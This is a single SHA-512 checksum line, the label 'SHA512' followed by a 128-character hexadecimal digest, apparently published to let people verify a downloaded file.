SHA5120396f3dbee3dc36ff84175f8cd29624c9a0aecf3c55b9769b393765f4e8da6527c02efcf05e818ccf74e07bf080480585df0e287f31c47e3ece5bde4a4cb1326